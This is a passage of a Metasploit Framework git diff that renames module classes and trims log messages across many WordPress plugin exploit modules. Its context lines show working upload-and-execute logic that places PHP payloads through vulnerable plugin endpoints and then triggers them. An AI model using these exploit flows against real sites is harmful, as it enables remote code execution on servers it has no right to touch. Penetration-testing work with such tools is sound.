print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") plugin_name = Rex::Text.rand_text_alpha(10) payload_name = "#{Rex::Text.rand_text_alpha(10)}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded - print_status("#{peer} - Executing the payload at #{payload_uri}...") + print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 008317ea7f..b76d8d9fdd 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 9f07c15816..247a904595 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -76,20 +76,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Trying to login as #{username}") + vprint_status("Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? - vprint_status("#{peer} - Trying to get nonce") + vprint_status("Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? - vprint_status("#{peer} - Trying to upload payload") + vprint_status("Trying to upload payload") # This must be default.php filename = 'default.php' - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file") + print_status("Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index 9d0cbd7ce6..fec5e636cb 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php'), @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'assets', 'temp', payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index f09d836152..f9ac0917a8 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /files|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index 3504f81df9..711a3c81ec 100644 --- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"") - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'post.php'), @@ -61,14 +61,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/ uploaded_filename = res.body register_files_for_cleanup(uploaded_filename) - print_status("#{peer} - File #{uploaded_filename} successfully uploaded") + print_status("File #{uploaded_filename} successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - Error on uploading file") end file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename) - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( { 'uri' => file_path, diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 9d554ee3e2..714471ec6b 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -111,29 +111,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication - vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication + vprint_status("WordPress authentication attack is enabled") if use_wordpress_authentication + vprint_status("EC authentication attack is enabled") if use_ec_authentication if use_wordpress_authentication && use_ec_authentication - print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") + print_status("Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") end if use_wordpress_authentication - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) if !cookie if use_ec_authentication - print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") + print_warning("Failed to authenticate with WordPress, attempting upload with EC password next...") else fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') end else - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") end end - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) date_hash = Rex::Text.md5(Time.now.to_s) uploaded_filename = "#{payload_name}_#{date_hash}.php" @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => uploader_url, @@ -152,9 +152,9 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? - vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_error("Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") register_files_for_cleanup(uploaded_filename) res = send_request_cgi( { @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if !res.nil? && res.code == 404 - print_error("#{peer} - Failed to upload the payload") + print_error("Failed to upload the payload") else - print_good("#{peer} - Executed payload") + print_good("Executed payload") end end end diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 1fefb811ca..5b46f5a16a 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") - print_status("#{peer} - Sending PHP payload") + print_status("Sending PHP payload") res = send_request_cgi( 'method' => 'POST', @@ -67,19 +67,19 @@ class Metasploit3 < Msf::Exploit::Remote ) if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end filename = "#{Regexp.last_match[1]}.php" - print_good("#{peer} - Our payload is at: #{filename}. Calling payload...") + print_good("Our payload is at: #{filename}. Calling payload...") register_files_for_cleanup(filename) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) ) - print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 + print_error("Server returned #{res.code}") if res && res.code != 200 end end diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index 1fb64e7e7c..805a886437 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -46,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(5)}.php" - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'), @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") }, 5 diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index f7e59f655a..b6e1d7ddc1 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbmysql' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 54485a0287..9a77ef8950 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -76,11 +76,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index f06a853ea6..feae3662d5 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body.include?(php_page_name) - print_good("#{peer} - Our payload is at: #{php_page_name}.") + print_good("Our payload is at: #{php_page_name}.") register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not answer') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 6338d3ed78..fd7a419a6c 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -66,13 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end - print_status("#{peer} - Calling payload ...") + print_status("Calling payload ...") send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_lastpost_exec.rb b/modules/exploits/unix/webapp/wp_lastpost_exec.rb index f807f9e58c..8f5fc9ba22 100644 --- a/modules/exploits/unix/webapp/wp_lastpost_exec.rb +++ b/modules/exploits/unix/webapp/wp_lastpost_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 806e529145..c7027abc93 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue JSON::ParserError fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename') end - print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...") + print_good("Our payload is at: #{new_php_pagename}. Calling payload...") register_files_for_cleanup(new_php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown,'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index a0a6ac4c0e..9b10986e87 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) #get upload filepath - print_status("#{peer} - Getting the upload path...") + print_status("Getting the upload path...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"") post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"") - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") n_data = post_data.to_s @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to upload payload") end - print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...") + print_good("Payload uploaded successfully. Disclosing the payload path...") #get path to payload res = send_request_cgi({ 'method' => 'GET', @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(File::basename(u.path)) - print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...") + print_good("Our payload is at: #{u.path}! Executing payload...") send_request_cgi({ 'method' => 'GET', 'uri' => u.path diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 765e103f5a..941dc8f538 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) data = generate_mime_message(payload, payload_name) upload_dir = "#{Rex::Text.rand_text_alpha(5)}/" - print_status("#{peer} - Uploading payload to #{upload_dir}...") + print_status("Uploading payload to #{upload_dir}...") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") begin json = JSON.parse(res.body) if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil? @@ -105,17 +105,17 @@ class Metasploit3 < Msf::Exploit::Remote uploaded_name = json['files'][0]['name'][0..-5] php_file_name = "#{uploaded_name}.php" payload_url = normalize_uri(wordpress_url_backend, upload_dir, uploaded_name, php_file_name) - print_good("#{peer} - Parsed response") + print_good("Parsed response") register_files_for_cleanup(php_file_name) register_files_for_cleanup("../#{uploaded_name}.zip") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") end rescue fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 48bc1b3f85..a75eefc24b 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient @@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be WordPress site") end - print_status("#{peer} - Starting up web service...") + print_status("Starting up web service...") start_service payload_uri = generate_payload_uri - vprint_status("#{peer} - Using URI #{payload_uri}") + vprint_status("Using URI #{payload_uri}") random_file_name = rand_text_alphanumeric(rand(5) + 5) post = { @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" } - print_status("#{peer} - Uploading payload #{random_file_name}...") + print_status("Uploading payload #{random_file_name}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") datastore['TRIES'].times do |i| payload_name = "#{random_file_name}_#{server_epoch_time + i}.php" res = call_payload(payload_name) @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = wordpress_and_online? unless res - vprint_error("#{peer} - It doesn't look like a WordPress site") + vprint_error("It doesn't look like a WordPress site") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 18118ed20c..d71747cf93 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('pagelines', nil, nil, 'form-data; name="page"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_admin_post, diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 567ac81937..be24e09124 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => request_uri, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote upload_uri = normalize_uri(res.body) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 363b9441a4..7590f4caef 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /success|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 6ae240b2d9..c79b3069df 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -77,8 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) - print_good("#{peer} - Our payload is at: #{final_uri}") - print_status("#{peer} - Calling payload...") + print_good("Our payload is at: #{final_uri}") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index b1f4e67ad4..b6d53feb0a 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -60,14 +60,14 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => 